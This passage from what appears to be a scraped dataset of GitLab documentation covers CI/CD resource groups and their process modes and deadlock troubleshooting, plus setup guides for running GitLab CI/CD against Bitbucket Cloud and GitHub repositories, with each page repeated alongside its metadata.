the list of upcoming jobs that are sorted by pipeline ID in descending order. | You want to execute jobs from the newest pipeline and [prevent outdated deployment jobs](../environments/deployment_safety.md#prevent-outdated-deployment-jobs). Each job must be idempotent. | | `newest_ready_first` | When a resource is free, picks the first job from the list of upcoming jobs waiting on this resource. Jobs are sorted by pipeline ID in descending order. | You want to prevent `newest_first` from prioritizing new pipelines before deploying the current pipeline. Faster than `newest_first`. Each job must be idempotent. | ### Change the process mode To change the process mode of a resource group, you must use the API and send a request to [edit an existing resource group](../../api/resource_groups.md#edit-an-existing-resource-group) by specifying the `process_mode`: - `unordered` - `oldest_first` - `newest_first` - `newest_ready_first` ### An example of difference between the process modes Consider the following `.gitlab-ci.yml`, where we have two jobs `build` and `deploy` each running in their own stage, and the `deploy` job has a resource group set to `production`: ```yaml build: stage: build script: echo "Your build script" deploy: stage: deploy script: echo "Your deployment script" environment: production resource_group: production ``` If three commits are pushed to the project in a short interval, that means that three pipelines run almost at the same time: - The first pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-1`. - The second pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-2`. - The third pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-3`. Depending on the process mode of the resource group: - If the process mode is set to `unordered`: - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently. - There is no guarantee on the job execution order, for example, `deploy-1` could run before or after `deploy-3` runs. - If the process mode is `oldest_first`: - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently. - `deploy-1` runs first, `deploy-2` runs second, and `deploy-3` runs last. - If the process mode is `newest_first`: - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently. - `deploy-3` runs first, `deploy-2` runs second and `deploy-1` runs last. ## Pipeline-level concurrency control with cross-project/parent-child pipelines You can define `resource_group` for downstream pipelines that are sensitive to concurrent executions. The [`trigger` keyword](../yaml/_index.md#trigger) can trigger downstream pipelines and the [`resource_group` keyword](../yaml/_index.md#resource_group) can co-exist with it. `resource_group` is efficient to control the concurrency of deployment pipelines, while other jobs can continue to run concurrently. The following example has two pipeline configurations in a project. When a pipeline starts running, non-sensitive jobs are executed first and aren't affected by concurrent executions in other pipelines. However, GitLab ensures that there are no other deployment pipelines running before triggering a deployment (child) pipeline. If other deployment pipelines are running, GitLab waits until those pipelines finish before running another one. ```yaml # .gitlab-ci.yml (parent pipeline) build: stage: build script: echo "Building..." test: stage: test script: echo "Testing..." deploy: stage: deploy trigger: include: deploy.gitlab-ci.yml strategy: mirror resource_group: AWS-production ``` ```yaml # deploy.gitlab-ci.yml (child pipeline) stages: - provision - deploy provision: stage: provision script: echo "Provisioning..." deployment: stage: deploy script: echo "Deploying..." environment: production ``` You must define [`trigger:strategy`](../yaml/_index.md#triggerstrategy) to ensure the lock isn't released until the downstream pipeline finishes. ## Related topics - [API documentation](../../api/resource_groups.md) - [Log documentation](../../administration/logs/_index.md#ci_resource_groups_jsonlog) - [GitLab for safe deployments](../environments/deployment_safety.md) ## Troubleshooting ### Avoid dead locks in pipeline configurations Because [`oldest_first` process mode](#process-modes) enforces the jobs to be executed in a pipeline order, there is a case that it doesn't work well with the other CI features. For example, when you run [a child pipeline](../pipelines/downstream_pipelines.md#parent-child-pipelines) that requires the same resource group with the parent pipeline, a dead lock could happen. Here is an example of a bad setup: ```yaml # BAD test: stage: test trigger: include: child-pipeline-requires-production-resource-group.yml strategy: mirror deploy: stage: deploy script: echo resource_group: production environment: production ``` In a parent pipeline, it runs the `test` job that subsequently runs a child pipeline, and the [`strategy: mirror` option](../yaml/_index.md#triggerstrategy) makes the `test` job wait until the child pipeline has finished. The parent pipeline runs the `deploy` job in the next stage, that requires a resource from the `production` resource group. If the process mode is `oldest_first`, it executes the jobs from the oldest pipelines, meaning the `deploy` job is executed next. However, a child pipeline also requires a resource from the `production` resource group. Because the child pipeline is newer than the parent pipeline, the child pipeline waits until the `deploy` job is finished, something that never happens. In this case, you should specify the `resource_group` keyword in the parent pipeline configuration instead: ```yaml # GOOD test: stage: test trigger: include: child-pipeline.yml strategy: mirror resource_group: production # Specify the resource group in the parent pipeline deploy: stage: deploy script: echo resource_group: production environment: production ``` ### Jobs get stuck in "Waiting for resource" Sometimes, a job hangs with the message `Waiting for resource: <resource_group>`. To resolve, first check that the resource group is working correctly: 1. Go to the job details page. 1. If the resource is assigned to a job, select **View job currently using resource** and check the job status. - If the status is `running` or `pending`, the feature is working correctly. Wait until the job finishes and releases the resource. - If the status is `created` and the [process mode](#process-modes) is either **Oldest first** or **Newest first**, the feature is working correctly. Visit the pipeline page of the job and check which upstream stage or job is blocking the execution. - If none of the previous conditions are met, the feature might not be working correctly. [Report the issue to GitLab](#report-an-issue). 1. If **View job currently using resource** is not available, the resource is not assigned to a job. Instead, check the resource's upcoming jobs. 1. Get the resource's upcoming jobs with the [REST API](../../api/resource_groups.md#list-upcoming-jobs-for-a-specific-resource-group). 1. Verify that the resource group's [process mode](#process-modes) is **Oldest first**. 1. Find the first job in the list of upcoming jobs, and get the job details [with GraphQL](#get-job-details-through-graphql). 1. If the first job's pipeline is an older pipeline, try to cancel the pipeline or the job itself. 1. Optional. Repeat this process if the next upcoming job is still in an older pipeline that should no longer run. 1. If the problem persists, [report the issue to GitLab](#report-an-issue). #### Race conditions in complex or busy pipelines If you can't resolve your issue with the solutions above, you might be encountering a known race condition issue. The race condition happens in complex or busy pipelines. For example, you might encounter the race condition if you have: - A pipeline with multiple child pipelines. - A single project with multiple pipelines running simultaneously. If you think you are running into this problem, [report the issue to GitLab](#report-an-issue) and leave a comment on [issue 436988](https://gitlab.com/gitlab-org/gitlab/-/issues/436988) with a link to your new issue. To confirm the problem, GitLab might ask for additional details such as your full pipeline configuration. As a temporary workaround, you can: - Start a new pipeline. - Re-run a finished job that has the same resource group as the stuck job. For example, if you have a `setup_job` and a `deploy_job` with the same resource group, the `setup_job` might finish while the `deploy_job` is stuck `waiting for resource`. Re-run the `setup_job` to restart the whole process and allow `deploy_job` to finish. #### Get job details through GraphQL You can get job information from the GraphQL API. You should use the GraphQL API if you use [pipeline-level concurrency control with cross-project/parent-child pipelines](#pipeline-level-concurrency-control-with-cross-projectparent-child-pipelines) because the trigger jobs are not accessible from the UI. To get job information from the GraphQL API: 1. Go to the pipeline details page. 1. Select the **Jobs** tab and find the ID of the stuck job. 1. Go to the [interactive GraphQL explorer](../../api/graphql/_index.md#interactive-graphql-explorer). 1. Run the following query: ```graphql { project(fullPath: "<fullpath-to-your-project>") { name job(id: "gid://gitlab/Ci::Build/<job-id>") { name status detailedStatus { action { path buttonTitle } } } } } ``` The `job.detailedStatus.action.path` field contains the job ID using the resource. 1. Run the following query and check `job.status` field according to the criteria above. You can also visit the pipeline page from `pipeline.path` field. ```graphql { project(fullPath: "<fullpath-to-your-project>") { name job(id: "gid://gitlab/Ci::Build/<job-id-currently-using-the-resource>") { name status pipeline { path } } } } ``` ### Report an issue [Open a new issue](https://gitlab.com/gitlab-org/gitlab/-/issues/new) with the following information: - The ID of the affected job. - The job status. - How often the problem occurs. - Steps to reproduce the problem. You can also [contact support](https://about.gitlab.com/support/#contact-support) for further assistance, or to get in touch with the development team.
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments description: Control the job concurrency in GitLab CI/CD title: Resource group breadcrumbs: - doc - ci - resource_groups --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} By default, pipelines in GitLab CI/CD run concurrently. Concurrency is an important factor to improve the feedback loop in merge requests, however, there are some situations that you may want to limit the concurrency on deployment jobs to run them one by one. Use resource groups to strategically control the concurrency of the jobs for optimizing your continuous deployments workflow with safety. ## Add a resource group You can add only one resource to a resource group. Provided that you have the following pipeline configuration (`.gitlab-ci.yml` file in your repository): ```yaml build: stage: build script: echo "Your build script" deploy: stage: deploy script: echo "Your deployment script" environment: production ``` Every time you push a new commit to a branch, it runs a new pipeline that has two jobs `build` and `deploy`. But if you push multiple commits in a short interval, multiple pipelines start running simultaneously, for example: - The first pipeline runs the jobs `build` -> `deploy` - The second pipeline runs the jobs `build` -> `deploy` In this case, the `deploy` jobs across different pipelines could run concurrently to the `production` environment. Running multiple deployment scripts to the same infrastructure could harm/confuse the instance and leave it in a corrupted state in the worst case. To ensure that a `deploy` job runs once at a time, you can specify [`resource_group` keyword](../yaml/_index.md#resource_group) to the concurrency sensitive job: ```yaml deploy: # ... resource_group: production ``` With this configuration, the safety on the deployments is assured while you can still run `build` jobs concurrently for maximizing the pipeline efficiency. ## Prerequisites - Familiarity with [GitLab CI/CD pipelines](../pipelines/_index.md) - Familiarity with [GitLab environments and deployments](../environments/_index.md) - At least the Developer role for the project to configure CI/CD pipelines. ## Process modes You can select a process mode to control the job concurrency for your deployment preferences. The following modes are supported: | Process mode | Description | When to use | |---------------|-------------|-------------| | `unordered` | The default process mode. Processes jobs whenever a job is ready to run. | The execution order of jobs is not important. The easiest option to use. | | `oldest_first` | When a resource is free, picks the first job from the list of upcoming jobs sorted by pipeline ID in ascending order. | You want to execute jobs from the oldest pipeline first. Less efficient than `unordered` mode, but safer for continuous deployments. | | `newest_first` | When a resource is free, picks the first job from the list of upcoming jobs that are sorted by pipeline ID in descending order. | You want to execute jobs from the newest pipeline and [prevent outdated deployment jobs](../environments/deployment_safety.md#prevent-outdated-deployment-jobs). Each job must be idempotent. | | `newest_ready_first` | When a resource is free, picks the first job from the list of upcoming jobs waiting on this resource. Jobs are sorted by pipeline ID in descending order. | You want to prevent `newest_first` from prioritizing new pipelines before deploying the current pipeline. Faster than `newest_first`. Each job must be idempotent. | ### Change the process mode To change the process mode of a resource group, you must use the API and send a request to [edit an existing resource group](../../api/resource_groups.md#edit-an-existing-resource-group) by specifying the `process_mode`: - `unordered` - `oldest_first` - `newest_first` - `newest_ready_first` ### An example of difference between the process modes Consider the following `.gitlab-ci.yml`, where we have two jobs `build` and `deploy` each running in their own stage, and the `deploy` job has a resource group set to `production`: ```yaml build: stage: build script: echo "Your build script" deploy: stage: deploy script: echo "Your deployment script" environment: production resource_group: production ``` If three commits are pushed to the project in a short interval, that means that three pipelines run almost at the same time: - The first pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-1`. - The second pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-2`. - The third pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-3`. Depending on the process mode of the resource group: - If the process mode is set to `unordered`: - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently. - There is no guarantee on the job execution order, for example, `deploy-1` could run before or after `deploy-3` runs. - If the process mode is `oldest_first`: - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently. - `deploy-1` runs first, `deploy-2` runs second, and `deploy-3` runs last. - If the process mode is `newest_first`: - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently. - `deploy-3` runs first, `deploy-2` runs second and `deploy-1` runs last. ## Pipeline-level concurrency control with cross-project/parent-child pipelines You can define `resource_group` for downstream pipelines that are sensitive to concurrent executions. The [`trigger` keyword](../yaml/_index.md#trigger) can trigger downstream pipelines and the [`resource_group` keyword](../yaml/_index.md#resource_group) can co-exist with it. `resource_group` is efficient to control the concurrency of deployment pipelines, while other jobs can continue to run concurrently. The following example has two pipeline configurations in a project. When a pipeline starts running, non-sensitive jobs are executed first and aren't affected by concurrent executions in other pipelines. However, GitLab ensures that there are no other deployment pipelines running before triggering a deployment (child) pipeline. If other deployment pipelines are running, GitLab waits until those pipelines finish before running another one. ```yaml # .gitlab-ci.yml (parent pipeline) build: stage: build script: echo "Building..." test: stage: test script: echo "Testing..." deploy: stage: deploy trigger: include: deploy.gitlab-ci.yml strategy: mirror resource_group: AWS-production ``` ```yaml # deploy.gitlab-ci.yml (child pipeline) stages: - provision - deploy provision: stage: provision script: echo "Provisioning..." deployment: stage: deploy script: echo "Deploying..." environment: production ``` You must define [`trigger:strategy`](../yaml/_index.md#triggerstrategy) to ensure the lock isn't released until the downstream pipeline finishes. ## Related topics - [API documentation](../../api/resource_groups.md) - [Log documentation](../../administration/logs/_index.md#ci_resource_groups_jsonlog) - [GitLab for safe deployments](../environments/deployment_safety.md) ## Troubleshooting ### Avoid dead locks in pipeline configurations Because [`oldest_first` process mode](#process-modes) enforces the jobs to be executed in a pipeline order, there is a case that it doesn't work well with the other CI features. For example, when you run [a child pipeline](../pipelines/downstream_pipelines.md#parent-child-pipelines) that requires the same resource group with the parent pipeline, a dead lock could happen. Here is an example of a bad setup: ```yaml # BAD test: stage: test trigger: include: child-pipeline-requires-production-resource-group.yml strategy: mirror deploy: stage: deploy script: echo resource_group: production environment: production ``` In a parent pipeline, it runs the `test` job that subsequently runs a child pipeline, and the [`strategy: mirror` option](../yaml/_index.md#triggerstrategy) makes the `test` job wait until the child pipeline has finished. The parent pipeline runs the `deploy` job in the next stage, that requires a resource from the `production` resource group. If the process mode is `oldest_first`, it executes the jobs from the oldest pipelines, meaning the `deploy` job is executed next. However, a child pipeline also requires a resource from the `production` resource group. Because the child pipeline is newer than the parent pipeline, the child pipeline waits until the `deploy` job is finished, something that never happens. In this case, you should specify the `resource_group` keyword in the parent pipeline configuration instead: ```yaml # GOOD test: stage: test trigger: include: child-pipeline.yml strategy: mirror resource_group: production # Specify the resource group in the parent pipeline deploy: stage: deploy script: echo resource_group: production environment: production ``` ### Jobs get stuck in "Waiting for resource" Sometimes, a job hangs with the message `Waiting for resource: <resource_group>`. To resolve, first check that the resource group is working correctly: 1. Go to the job details page. 1. If the resource is assigned to a job, select **View job currently using resource** and check the job status. - If the status is `running` or `pending`, the feature is working correctly. Wait until the job finishes and releases the resource. - If the status is `created` and the [process mode](#process-modes) is either **Oldest first** or **Newest first**, the feature is working correctly. Visit the pipeline page of the job and check which upstream stage or job is blocking the execution. - If none of the previous conditions are met, the feature might not be working correctly. [Report the issue to GitLab](#report-an-issue). 1. If **View job currently using resource** is not available, the resource is not assigned to a job. Instead, check the resource's upcoming jobs. 1. Get the resource's upcoming jobs with the [REST API](../../api/resource_groups.md#list-upcoming-jobs-for-a-specific-resource-group). 1. Verify that the resource group's [process mode](#process-modes) is **Oldest first**. 1. Find the first job in the list of upcoming jobs, and get the job details [with GraphQL](#get-job-details-through-graphql). 1. If the first job's pipeline is an older pipeline, try to cancel the pipeline or the job itself. 1. Optional. Repeat this process if the next upcoming job is still in an older pipeline that should no longer run. 1. If the problem persists, [report the issue to GitLab](#report-an-issue). #### Race conditions in complex or busy pipelines If you can't resolve your issue with the solutions above, you might be encountering a known race condition issue. The race condition happens in complex or busy pipelines. For example, you might encounter the race condition if you have: - A pipeline with multiple child pipelines. - A single project with multiple pipelines running simultaneously. If you think you are running into this problem, [report the issue to GitLab](#report-an-issue) and leave a comment on [issue 436988](https://gitlab.com/gitlab-org/gitlab/-/issues/436988) with a link to your new issue. To confirm the problem, GitLab might ask for additional details such as your full pipeline configuration. As a temporary workaround, you can: - Start a new pipeline. - Re-run a finished job that has the same resource group as the stuck job. For example, if you have a `setup_job` and a `deploy_job` with the same resource group, the `setup_job` might finish while the `deploy_job` is stuck `waiting for resource`. Re-run the `setup_job` to restart the whole process and allow `deploy_job` to finish. #### Get job details through GraphQL You can get job information from the GraphQL API. You should use the GraphQL API if you use [pipeline-level concurrency control with cross-project/parent-child pipelines](#pipeline-level-concurrency-control-with-cross-projectparent-child-pipelines) because the trigger jobs are not accessible from the UI. To get job information from the GraphQL API: 1. Go to the pipeline details page. 1. Select the **Jobs** tab and find the ID of the stuck job. 1. Go to the [interactive GraphQL explorer](../../api/graphql/_index.md#interactive-graphql-explorer). 1. Run the following query: ```graphql { project(fullPath: "<fullpath-to-your-project>") { name job(id: "gid://gitlab/Ci::Build/<job-id>") { name status detailedStatus { action { path buttonTitle } } } } } ``` The `job.detailedStatus.action.path` field contains the job ID using the resource. 1. Run the following query and check `job.status` field according to the criteria above. You can also visit the pipeline page from `pipeline.path` field. ```graphql { project(fullPath: "<fullpath-to-your-project>") { name job(id: "gid://gitlab/Ci::Build/<job-id-currently-using-the-resource>") { name status pipeline { path } } } } ``` ### Report an issue [Open a new issue](https://gitlab.com/gitlab-org/gitlab/-/issues/new) with the following information: - The ID of the affected job. - The job status. - How often the problem occurs. - Steps to reproduce the problem. You can also [contact support](https://about.gitlab.com/support/#contact-support) for further assistance, or to get in touch with the development team.
https://docs.gitlab.com/ci/bitbucket_integration
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/bitbucket_integration.md
2025-08-13
doc/ci/ci_cd_for_external_repos
[ "doc", "ci", "ci_cd_for_external_repos" ]
bitbucket_integration.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using GitLab CI/CD with a Bitbucket Cloud repository
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab CI/CD can be used with Bitbucket Cloud by: 1. Creating a [CI/CD project](_index.md). 1. Connecting your Git repository by URL. To use GitLab CI/CD with a Bitbucket Cloud repository: 1. In Bitbucket, create an [**App password**](https://support.atlassian.com/bitbucket-cloud/docs/create-an-app-password/) to authenticate the script that sets commit build statuses in Bitbucket. Repository write permissions are required. ![Bitbucket Cloud webhook](img/bitbucket_app_password_v10_6.png) 1. In Bitbucket, from your repository, select **Clone**, then copy the URL that starts after `git clone`. 1. In GitLab, create a project: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Run CI/CD for external repository**. 1. Select **Repository by URL**. 1. Complete the fields: - For **Git repository URL**, enter the URL of your Bitbucket repository. Make sure to remove your `@username`. - For **Username**, enter the username associated with the App password. - For **Password**, enter the App password from Bitbucket. GitLab imports the repository and enables [Pull Mirroring](../../user/project/repository/mirror/pull.md). You can check that mirroring is working in the project in **Settings > Repository > Mirroring repositories**. 1. In GitLab, create a [personal access token](../../user/profile/personal_access_tokens.md) with `api` scope. The token is used to authenticate requests from the web hook that is created in Bitbucket to notify GitLab of new commits. 1. In Bitbucket, from **Settings > Webhooks**, create a new webhook to notify GitLab of new commits. The webhook URL should be set to the GitLab API to trigger pull mirroring, using the personal access token we just generated for authentication. ```plaintext https://gitlab.example.com/api/v4/projects/:project_id/mirror/pull?private_token=<your_personal_access_token> ``` The webhook trigger should be set to **Repository Push**. ![Bitbucket Cloud webhook](img/bitbucket_webhook_v10_6.png) After saving, test the webhook by pushing a change to your Bitbucket repository. 1. In GitLab, from **Settings > CI/CD > Variables**, add variables to allow communication with Bitbucket through the Bitbucket API: - `BITBUCKET_ACCESS_TOKEN`: The Bitbucket app password created previously. This variable should be [masked](../variables/_index.md#mask-a-cicd-variable). - `BITBUCKET_USERNAME`: The username of the Bitbucket account. - `BITBUCKET_NAMESPACE`: Set this variable if your GitLab and Bitbucket namespaces differ. - `BITBUCKET_REPOSITORY`: Set this variable if your GitLab and Bitbucket project names differ. 1. In Bitbucket, add a script that pushes the pipeline status to Bitbucket. The script is created in Bitbucket, but the mirroring process copies it to the GitLab mirror. The GitLab CI/CD pipeline runs the script, and pushes the status back to Bitbucket. Create a file `build_status`, insert the following script and run `chmod +x build_status` in your terminal to make the script executable. ```shell #!/usr/bin/env bash # Push GitLab CI/CD build status to Bitbucket Cloud if [ -z "$BITBUCKET_ACCESS_TOKEN" ]; then echo "ERROR: BITBUCKET_ACCESS_TOKEN is not set" exit 1 fi if [ -z "$BITBUCKET_USERNAME" ]; then echo "ERROR: BITBUCKET_USERNAME is not set" exit 1 fi if [ -z "$BITBUCKET_NAMESPACE" ]; then echo "Setting BITBUCKET_NAMESPACE to $CI_PROJECT_NAMESPACE" BITBUCKET_NAMESPACE=$CI_PROJECT_NAMESPACE fi if [ -z "$BITBUCKET_REPOSITORY" ]; then echo "Setting BITBUCKET_REPOSITORY to $CI_PROJECT_NAME" BITBUCKET_REPOSITORY=$CI_PROJECT_NAME fi BITBUCKET_API_ROOT="https://api.bitbucket.org/2.0" BITBUCKET_STATUS_API="$BITBUCKET_API_ROOT/repositories/$BITBUCKET_NAMESPACE/$BITBUCKET_REPOSITORY/commit/$CI_COMMIT_SHA/statuses/build" BITBUCKET_KEY="ci/gitlab-ci/$CI_JOB_NAME" case "$BUILD_STATUS" in running) BITBUCKET_STATE="INPROGRESS" BITBUCKET_DESCRIPTION="The build is running!" ;; passed) BITBUCKET_STATE="SUCCESSFUL" BITBUCKET_DESCRIPTION="The build passed!" ;; failed) BITBUCKET_STATE="FAILED" BITBUCKET_DESCRIPTION="The build failed." ;; esac echo "Pushing status to $BITBUCKET_STATUS_API..." curl --request POST "$BITBUCKET_STATUS_API" \ --user $BITBUCKET_USERNAME:$BITBUCKET_ACCESS_TOKEN \ --header "Content-Type:application/json" \ --silent \ --data "{ \"state\": \"$BITBUCKET_STATE\", \"key\": \"$BITBUCKET_KEY\", \"description\": \"$BITBUCKET_DESCRIPTION\",\"url\": \"$CI_PROJECT_URL/-/jobs/$CI_JOB_ID\" }" ``` 1. In Bitbucket, create a `.gitlab-ci.yml` file to use the script to push pipeline success and failures to Bitbucket. Similar to the script added previously, this file is copied to the GitLab repository as part of the mirroring process. ```yaml stages: - test - ci_status unit-tests: script: - echo "Success. Add your tests!" success: stage: ci_status before_script: - "" after_script: - "" script: - BUILD_STATUS=passed BUILD_KEY=push ./build_status when: on_success failure: stage: ci_status before_script: - "" after_script: - "" script: - BUILD_STATUS=failed BUILD_KEY=push ./build_status when: on_failure ``` GitLab is now configured to mirror changes from Bitbucket, run CI/CD pipelines configured in `.gitlab-ci.yml` and push the status to Bitbucket.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using GitLab CI/CD with a Bitbucket Cloud repository breadcrumbs: - doc - ci - ci_cd_for_external_repos --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab CI/CD can be used with Bitbucket Cloud by: 1. Creating a [CI/CD project](_index.md). 1. Connecting your Git repository by URL. To use GitLab CI/CD with a Bitbucket Cloud repository: 1. In Bitbucket, create an [**App password**](https://support.atlassian.com/bitbucket-cloud/docs/create-an-app-password/) to authenticate the script that sets commit build statuses in Bitbucket. Repository write permissions are required. ![Bitbucket Cloud webhook](img/bitbucket_app_password_v10_6.png) 1. In Bitbucket, from your repository, select **Clone**, then copy the URL that starts after `git clone`. 1. In GitLab, create a project: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Run CI/CD for external repository**. 1. Select **Repository by URL**. 1. Complete the fields: - For **Git repository URL**, enter the URL of your Bitbucket repository. Make sure to remove your `@username`. - For **Username**, enter the username associated with the App password. - For **Password**, enter the App password from Bitbucket. GitLab imports the repository and enables [Pull Mirroring](../../user/project/repository/mirror/pull.md). You can check that mirroring is working in the project in **Settings > Repository > Mirroring repositories**. 1. In GitLab, create a [personal access token](../../user/profile/personal_access_tokens.md) with `api` scope. The token is used to authenticate requests from the web hook that is created in Bitbucket to notify GitLab of new commits. 1. In Bitbucket, from **Settings > Webhooks**, create a new webhook to notify GitLab of new commits. The webhook URL should be set to the GitLab API to trigger pull mirroring, using the personal access token we just generated for authentication. ```plaintext https://gitlab.example.com/api/v4/projects/:project_id/mirror/pull?private_token=<your_personal_access_token> ``` The webhook trigger should be set to **Repository Push**. ![Bitbucket Cloud webhook](img/bitbucket_webhook_v10_6.png) After saving, test the webhook by pushing a change to your Bitbucket repository. 1. In GitLab, from **Settings > CI/CD > Variables**, add variables to allow communication with Bitbucket through the Bitbucket API: - `BITBUCKET_ACCESS_TOKEN`: The Bitbucket app password created previously. This variable should be [masked](../variables/_index.md#mask-a-cicd-variable). - `BITBUCKET_USERNAME`: The username of the Bitbucket account. - `BITBUCKET_NAMESPACE`: Set this variable if your GitLab and Bitbucket namespaces differ. - `BITBUCKET_REPOSITORY`: Set this variable if your GitLab and Bitbucket project names differ. 1. In Bitbucket, add a script that pushes the pipeline status to Bitbucket. The script is created in Bitbucket, but the mirroring process copies it to the GitLab mirror. The GitLab CI/CD pipeline runs the script, and pushes the status back to Bitbucket. Create a file `build_status`, insert the following script and run `chmod +x build_status` in your terminal to make the script executable. ```shell #!/usr/bin/env bash # Push GitLab CI/CD build status to Bitbucket Cloud if [ -z "$BITBUCKET_ACCESS_TOKEN" ]; then echo "ERROR: BITBUCKET_ACCESS_TOKEN is not set" exit 1 fi if [ -z "$BITBUCKET_USERNAME" ]; then echo "ERROR: BITBUCKET_USERNAME is not set" exit 1 fi if [ -z "$BITBUCKET_NAMESPACE" ]; then echo "Setting BITBUCKET_NAMESPACE to $CI_PROJECT_NAMESPACE" BITBUCKET_NAMESPACE=$CI_PROJECT_NAMESPACE fi if [ -z "$BITBUCKET_REPOSITORY" ]; then echo "Setting BITBUCKET_REPOSITORY to $CI_PROJECT_NAME" BITBUCKET_REPOSITORY=$CI_PROJECT_NAME fi BITBUCKET_API_ROOT="https://api.bitbucket.org/2.0" BITBUCKET_STATUS_API="$BITBUCKET_API_ROOT/repositories/$BITBUCKET_NAMESPACE/$BITBUCKET_REPOSITORY/commit/$CI_COMMIT_SHA/statuses/build" BITBUCKET_KEY="ci/gitlab-ci/$CI_JOB_NAME" case "$BUILD_STATUS" in running) BITBUCKET_STATE="INPROGRESS" BITBUCKET_DESCRIPTION="The build is running!" ;; passed) BITBUCKET_STATE="SUCCESSFUL" BITBUCKET_DESCRIPTION="The build passed!" ;; failed) BITBUCKET_STATE="FAILED" BITBUCKET_DESCRIPTION="The build failed." ;; esac echo "Pushing status to $BITBUCKET_STATUS_API..." curl --request POST "$BITBUCKET_STATUS_API" \ --user $BITBUCKET_USERNAME:$BITBUCKET_ACCESS_TOKEN \ --header "Content-Type:application/json" \ --silent \ --data "{ \"state\": \"$BITBUCKET_STATE\", \"key\": \"$BITBUCKET_KEY\", \"description\": \"$BITBUCKET_DESCRIPTION\",\"url\": \"$CI_PROJECT_URL/-/jobs/$CI_JOB_ID\" }" ``` 1. In Bitbucket, create a `.gitlab-ci.yml` file to use the script to push pipeline success and failures to Bitbucket. Similar to the script added previously, this file is copied to the GitLab repository as part of the mirroring process. ```yaml stages: - test - ci_status unit-tests: script: - echo "Success. Add your tests!" success: stage: ci_status before_script: - "" after_script: - "" script: - BUILD_STATUS=passed BUILD_KEY=push ./build_status when: on_success failure: stage: ci_status before_script: - "" after_script: - "" script: - BUILD_STATUS=failed BUILD_KEY=push ./build_status when: on_failure ``` GitLab is now configured to mirror changes from Bitbucket, run CI/CD pipelines configured in `.gitlab-ci.yml` and push the status to Bitbucket.
https://docs.gitlab.com/ci/github_integration
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/github_integration.md
2025-08-13
doc/ci/ci_cd_for_external_repos
[ "doc", "ci", "ci_cd_for_external_repos" ]
github_integration.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using GitLab CI/CD with a GitHub repository
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} GitLab CI/CD can be used with **GitHub.com** and **GitHub Enterprise** by creating a [CI/CD project](_index.md) to connect your GitHub repository to GitLab. <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Watch a video on [Using GitLab CI/CD pipelines with GitHub repositories](https://www.youtube.com/watch?v=qgl3F2j-1cI). {{< alert type="note" >}} Because of [GitHub limitations](https://gitlab.com/gitlab-org/gitlab/-/issues/9147), [GitHub OAuth](../../integration/github.md#enable-github-oauth-in-gitlab) cannot be used to authenticate with GitHub as an external CI/CD repository. {{< /alert >}} ## Connect with personal access token Personal access tokens can only be used to connect GitHub.com repositories to GitLab, and the GitHub user must have the [owner role](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github). To perform a one-off authorization with GitHub to grant GitLab access your repositories: 1. In GitHub, create a token: 1. Open <https://github.com/settings/tokens/new>. 1. Create a personal access token. 1. Enter a **Token description** and update the scope to allow `repo` and `admin:repo_hook` so that GitLab can access your project, update commit statuses, and create a web hook to notify GitLab of new commits. 1. In GitLab, create a project: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Run CI/CD for external repository**. 1. Select **GitHub**. 1. For **Personal access token**, paste the token. 1. Select **List Repositories**. 1. Select **Connect** to select the repository. 1. In GitHub, add a `.gitlab-ci.yml` to [configure GitLab CI/CD](../quick_start/_index.md). GitLab: 1. Imports the project. 1. Enables [pull mirroring](../../user/project/repository/mirror/pull.md). 1. Enables [GitHub project integration](../../user/project/integrations/github.md). 1. Creates a web hook on GitHub to notify GitLab of new commits. ## Connect manually To use **GitHub Enterprise** with **GitLab.com**, use this method. To manually enable GitLab CI/CD for your repository: 1. In GitHub, create a token: 1. Open <https://github.com/settings/tokens/new>. 1. Create a personal access token. 1. Enter a **Token description** and update the scope to allow `repo` so that GitLab can access your project and update commit statuses. 1. In GitLab, create a project: 1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**. 1. Select **Run CI/CD for external repository** and **Repository by URL**. 1. In the **Git repository URL** field, enter the HTTPS URL for your GitHub repository. If your project is private, use the personal access token you just created for authentication. 1. Fill in all the other fields and select **Create project**. GitLab automatically configures polling-based pull mirroring. 1. In GitLab, enable [GitHub project integration](../../user/project/integrations/github.md): 1. On the left sidebar, select **Settings > Integrations**. 1. Select the **Active** checkbox. 1. 